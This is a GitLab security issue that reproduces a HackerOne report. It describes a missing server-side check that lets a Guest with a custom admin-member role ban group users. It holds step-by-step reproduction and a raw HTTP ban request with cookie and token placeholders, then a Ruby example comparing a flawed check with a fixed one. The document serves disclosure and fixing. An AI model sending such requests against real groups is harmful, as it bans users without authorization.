
Guest with custom role `Admin group member` can ban users

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2431597 by ashish_r_padelkar on 2024-03-23, assigned to @kmorrison1:


Report

Summary

Hello,

As per this document https://docs.gitlab.com/ee/user/group/moderate_users.html#ban-a-user, you need to have the Owner role to ban a user from a group.

However, it is possible for a Guest user with the custom role permission Admin group member to ban any user from the group using this issue.

An Owner sees the option below, but a Guest user with the custom role permission Admin group member can't see the option in the UI, which is expected. Using a backend request, however, we can perform this action because of a missing permission check on the request.

Owner
Screenshot_2024-03-23_at_11.18.31_AM.png

**Guest user with Admin group member**
Screenshot_2024-03-23_at_11.18.22_AM.png

Steps to reproduce

1. As a group owner, go to https://gitlab.com/groups/groupmarch2024/-/settings/roles_and_permissions and create a custom role of Guest user with the Admin group member permission. Let's name this GuestGroupAdmin.

2. Now go to https://gitlab.com/groups/groupmarch2024/-/group_members and add 2 members: UserA with GuestGroupAdmin and UserB with the Maintainer role.

3. Now, as a group owner, you see the option to ban both of these users.

4. Log in as UserA and go to https://gitlab.com/groups/groupmarch2024/-/group_members. You won't see the ban option for users, which is expected and working as per the documentation.

5. Now grab your Cookie and authenticity_token (you can also use the X-Csrf-Token value in this) in the request below.

```http
POST /groups/groupmarch2024/-/group_members/98201602/ban HTTP/2
Host: gitlab.com
Cookie: <Replace_Your_Cookie_Here>
Content-Length: 117
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://gitlab.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://gitlab.com/groups/groupmarch2024/-/group_members
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

authenticity_token=<Replace_Your_token_Here>&_method=put
```

Where 98201602 is the ID of UserB here. You can get this ID in the HTML response of https://gitlab.com/groups/groupmarch2024/-/group_members (View Source and look for data-members-data).

Send the request and you should see that UserB is banned from the group.

What is the current bug behavior?

A Guest with Admin group member can ban users from the group, even users having higher permissions.

What is the expected correct behavior?

Only a group owner should be able to perform this, as per the documentation.

Output of checks

This bug happens on GitLab.com

Regards,
Ashish

Impact

Guest with custom role can ban users
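The defect described above is a server-side authorization gap: hiding the ban button in the UI is not a control, and the request handler must enforce the Owner requirement itself. The following Ruby snippet is an added illustration written for this issue, not GitLab's code and not its policy classes; the names `Group`, `Member`, `can_ban_flawed?`, `can_ban?` and `ban_member!` are invented for the example. It models the reported situation (an Owner, UserA as Guest with the custom `admin_group_member` ability, UserB as Maintainer), shows a check that consults the custom-role ability and therefore lets UserA ban UserB, and beside it the corrected check that requires the Owner role as the documentation states. The self-ban guard is an extra assumption of the example.

```ruby
# Added example for this issue, not GitLab's code: a small membership model
# showing the authorization gap the report describes and the check that closes it.
class AuthorizationError < StandardError; end

# A member has a base role and zero or more custom-role abilities. The report's
# "Admin group member" permission is modelled here as :admin_group_member.
Member = Struct.new(:user, :role, :custom_abilities, keyword_init: true)

class Group
  def initialize
    @members = {}
    @banned = []
  end

  def add(user:, role:, custom_abilities: [])
    @members[user] = Member.new(user: user, role: role, custom_abilities: custom_abilities)
  end

  def member(user)
    @members[user]
  end

  def banned?(user)
    @banned.include?(user)
  end

  def ban(user)
    @banned << user unless banned?(user)
  end
end

# Flawed check, mirroring the report: any member whose custom role carries
# :admin_group_member passes, so a Guest with that custom role can ban a Maintainer.
def can_ban_flawed?(group, actor, target)
  m = group.member(actor)
  return false unless m && group.member(target)
  m.role == :owner || m.custom_abilities.include?(:admin_group_member)
end

# Corrected check: banning is an Owner action per the linked documentation.
# Custom-role abilities are not consulted for it. The self-ban guard is an
# extra assumption of this example, not something the report states.
def can_ban?(group, actor, target)
  m = group.member(actor)
  return false unless m && group.member(target)
  return false if actor == target
  m.role == :owner
end

# Controller-style entry point: the check happens here, server-side, regardless
# of whether the UI rendered a ban button for the actor.
def ban_member!(group, actor, target, policy: method(:can_ban?))
  unless policy.call(group, actor, target)
    raise AuthorizationError, "#{actor} may not ban #{target}"
  end
  group.ban(target)
  true
end

# Constructed scenario matching the report's roles (not the report's real group).
def report_scenario
  g = Group.new
  g.add(user: "owner", role: :owner)
  g.add(user: "userA", role: :guest, custom_abilities: [:admin_group_member])
  g.add(user: "userB", role: :maintainer)
  g
end

if __FILE__ == $0
  g = report_scenario
  puts "flawed check lets userA ban userB: #{can_ban_flawed?(g, 'userA', 'userB')}"
  puts "fixed check lets userA ban userB:  #{can_ban?(g, 'userA', 'userB')}"
  ban_member!(g, "owner", "userB")
  puts "owner banned userB: #{g.banned?('userB')}"
  begin
    ban_member!(g, "userA", "owner")
  rescue AuthorizationError => e
    puts "denied: #{e.message}"
  end
end
```

The point of the two checks side by side is where the decision is made: `can_ban_flawed?` answers "does this member hold some admin-like ability", while `can_ban?` answers the documented question "does this member hold the Owner role". A request test that sends the ban action as UserA and expects a 403 would have caught the first form before release.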

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: